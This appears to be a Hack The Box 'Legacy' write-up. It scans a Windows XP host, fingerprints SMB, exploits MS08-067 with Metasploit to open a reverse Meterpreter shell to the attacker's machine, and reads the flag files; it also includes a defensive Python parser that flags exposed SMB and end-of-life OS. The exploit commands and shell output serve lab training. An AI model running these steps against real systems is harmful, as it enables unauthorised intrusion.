Legacy Write-Up

Machine IP - 10.10.10.4

Initial Phase

Starting with an nmap scan, we see the following ports open. An aggressive scan run in the background reveals the same ports.

root@kali:~/Desktop/Hack The Box/legacy# nmap -F 10.10.10.4
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-12 12:24 +04
Nmap scan report for 10.10.10.4
Host is up (0.21s latency).
Not shown: 97 filtered ports
PORT     STATE  SERVICE
139/tcp  open   netbios-ssn
445/tcp  open   microsoft-ds
3389/tcp closed ms-wbt-server

Nmap done: 1 IP address (1 host up) scanned in 4.91 seconds

SMB appears to be the only vector to exploit here. Therefore, a little recon using Metasploit:

msf5 > use auxiliary/scanner/smb/smb_version
msf5 auxiliary(scanner/smb/smb_version) > set RHOST 10.10.10.4
RHOST => 10.10.10.4
msf5 auxiliary(scanner/smb/smb_version) > run

[+] 10.10.10.4:445 - Host is running Windows XP SP3 (language:English) (name:LEGACY) (workgroup:HTB )
[*] 10.10.10.4:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

This gives us the OS as Windows XP SP3. Therefore, googling along the lines of 'Windows xp sp3 smb exploit' turns up the MS08-067 vulnerability entry on the Rapid7 website, which also has a Metasploit module.
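From the defender's side, the two outputs above are exactly what an asset-inventory check should be consuming: which SMB ports a host exposes, and which operating system it reports over SMB. The following is an added example (not part of the original write-up, and not Metasploit or Nmap code) that parses a plain `nmap -F` listing and an `smb_version` result line, then raises findings for SMB reachability and for an operating system that no longer receives security updates. The sample inputs are constructed to mirror the output shown earlier on this page, and the end-of-life list is a short illustrative assumption rather than an authoritative inventory.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed sample input mirroring the nmap -F output in the write-up.
NMAP_OUTPUT = """\
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-12 12:24 +04
Nmap scan report for 10.10.10.4
Host is up (0.21s latency).
Not shown: 97 filtered ports
PORT     STATE  SERVICE
139/tcp  open   netbios-ssn
445/tcp  open   microsoft-ds
3389/tcp closed ms-wbt-server
Nmap done: 1 IP address (1 host up) scanned in 4.91 seconds
"""

# Constructed sample input mirroring the smb_version result line.
SMB_VERSION_LINE = ("[+] 10.10.10.4:445 - Host is running Windows XP SP3 "
                    "(language:English) (name:LEGACY) (workgroup:HTB )")

# Assumption: a short illustrative list of OS families that no longer
# receive security updates; a real deployment would source this elsewhere.
END_OF_LIFE_OS = ("Windows XP", "Windows 2000", "Windows Server 2003")

# One "PORT/PROTO STATE SERVICE" row of nmap's normal output.
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)", re.MULTILINE)

# The fingerprint line emitted by auxiliary/scanner/smb/smb_version.
SMB_RE = re.compile(
    r"Host is running (?P<os>.+?) \(language:(?P<lang>[^)]*)\) "
    r"\(name:(?P<name>[^)]*)\) \(workgroup:(?P<wg>[^)]*)\)"
)


@dataclass
class HostAssessment:
    ip: str
    open_ports: Dict[int, str] = field(default_factory=dict)  # port -> service
    os_name: Optional[str] = None
    hostname: Optional[str] = None
    findings: List[str] = field(default_factory=list)


def parse_nmap(text: str) -> HostAssessment:
    """Extract the scanned address and every port nmap reports as open."""
    m = re.search(r"Nmap scan report for (\S+)", text)
    host = HostAssessment(ip=m.group(1) if m else "unknown")
    for port, _proto, state, service in PORT_RE.findall(text):
        if state == "open":            # closed/filtered rows are not exposure
            host.open_ports[int(port)] = service
    return host


def parse_smb_version(line: str) -> Optional[Dict[str, str]]:
    """Pull OS, NetBIOS name and workgroup out of an smb_version result line."""
    m = SMB_RE.search(line)
    if not m:
        return None
    return {k: m.group(k).strip() for k in ("os", "lang", "name", "wg")}


def assess(host: HostAssessment, smb_info: Optional[Dict[str, str]]) -> HostAssessment:
    """Attach findings: SMB exposed to the scanner, and an end-of-life OS."""
    smb_ports = sorted({139, 445}.intersection(host.open_ports))
    if smb_ports:
        host.findings.append(
            "SMB reachable from scanner on " + ", ".join(str(p) for p in smb_ports))
    if smb_info:
        host.os_name = smb_info["os"]
        host.hostname = smb_info["name"]
        if host.os_name.startswith(END_OF_LIFE_OS):
            host.findings.append(
                f"end-of-life OS fingerprinted over SMB: {host.os_name}")
    return host


def report(host: HostAssessment) -> str:
    """Render the assessment as a short plain-text summary."""
    lines = [f"{host.ip} ({host.hostname or 'unknown name'}): {host.os_name or 'OS unknown'}"]
    lines += [f"  - {f}" for f in host.findings] or ["  - no findings"]
    return "\n".join(lines)


if __name__ == "__main__":
    result = assess(parse_nmap(NMAP_OUTPUT), parse_smb_version(SMB_VERSION_LINE))
    print(report(result))
```

Run against the constructed input it reports the host as LEGACY / Windows XP SP3 with two findings; the same two parsers can be pointed at saved scan output from an internal sweep, and a host with neither finding produces "no findings".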

Exploit Phase

Using the exploit from the Rapid7 website, we get a shell as Administrator:

msf5 exploit(windows/smb/ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target address range or CIDR identifier
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf5 exploit(windows/smb/ms08_067_netapi) > set RHOST 10.10.10.4
RHOST => 10.10.10.4
msf5 exploit(windows/smb/ms08_067_netapi) > exploit

[*] Started reverse TCP handler on 10.10.14.68:4444
[*] 10.10.10.4:445 - Automatically detecting the target...
[*] 10.10.10.4:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 10.10.10.4:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 10.10.10.4:445 - Attempting to trigger the vulnerability...
[*] Sending stage (179779 bytes) to 10.10.10.4
[*] Meterpreter session 1 opened (10.10.14.68:4444 -> 10.10.10.4:1028) at 2019-04-12 12:38:09 +0400

meterpreter > shell
Process 1532 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>cd ..
cd ..

C:\WINDOWS>cd ..
cd ..

C:\>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 54BF-723B

 Directory of C:\

16/03/2017  08:30                 0 AUTOEXEC.BAT
16/03/2017  08:30                 0 CONFIG.SYS
16/03/2017  09:07    <DIR>          Documents and Settings
16/03/2017  08:33    <DIR>          Program Files
12/04/2019  08:28    <DIR>          WINDOWS
               2 File(s)              0 bytes
               3 Dir(s)   6.477.336.576 bytes free

C:\>cd "Documents and Settings"
cd "Documents and Settings"

C:\Documents and Settings>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 54BF-723B

 Directory of C:\Documents and Settings

16/03/2017  09:07    <DIR>          .
16/03/2017  09:07    <DIR>          ..
16/03/2017  09:07    <DIR>          Administrator
16/03/2017  08:29    <DIR>          All Users
16/03/2017  08:33    <DIR>          john
               0 File(s)              0 bytes
               5 Dir(s)   6.477.336.576 bytes free

C:\Documents and Settings>cd john
cd john

C:\Documents and Settings\john>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 54BF-723B

 Directory of C:\Documents and Settings\john

16/03/2017  08:33    <DIR>          .
16/03/2017  08:33    <DIR>          ..
16/03/2017  09:19    <DIR>          Desktop
16/03/2017  08:33    <DIR>          Favorites
16/03/2017  08:33    <DIR>          My Documents
16/03/2017  08:20    <DIR>          Start Menu
               0 File(s)              0 bytes
               6 Dir(s)   6.477.336.576 bytes free

C:\Documents and Settings\john>cd Desktop
cd Desktop

C:\Documents and Settings\john\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 54BF-723B

 Directory of C:\Documents and Settings\john\Desktop

16/03/2017  09:19    <DIR>          .
16/03/2017  09:19    <DIR>          ..
16/03/2017  09:19                32 user.txt
               1 File(s)             32 bytes
               2 Dir(s)   6.477.336.576 bytes free

C:\Documents and Settings\john\Desktop>type user.txt
type user.txt
e69af0e4f443de7e36876fda4ec7644f

C:\Documents and Settings\john\Desktop>cd ../..
cd ../..

C:\Documents and Settings>cd Administrator
cd Administrator

C:\Documents and Settings\Administrator>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 54BF-723B

 Directory of C:\Documents and Settings\Administrator

16/03/2017  09:07    <DIR>          .
16/03/2017  09:07    <DIR>          ..
16/03/2017  09:18    <DIR>          Desktop
16/03/2017  09:07    <DIR>          Favorites
16/03/2017  09:07    <DIR>          My Documents
16/03/2017  08:20    <DIR>          Start Menu
               0 File(s)              0 bytes
               6 Dir(s)   6.477.336.576 bytes free

C:\Documents and Settings\Administrator>cd Desktop
cd Desktop

C:\Documents and Settings\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 54BF-723B

 Directory of C:\Documents and Settings\Administrator\Desktop

16/03/2017  09:18    <DIR>          .
16/03/2017  09:18    <DIR>          ..
16/03/2017  09:18                32 root.txt
               1 File(s)             32 bytes
               2 Dir(s)   6.477.336.576 bytes free

C:\Documents and Settings\Administrator\Desktop>type root.tct
type root.tct
The system cannot find the file specified.

C:\Documents and Settings\Administrator\Desktop>type root.txt
type root.txt
993442d258b0e0ec917cae9e695d5713

Thus we get both the user and root flags.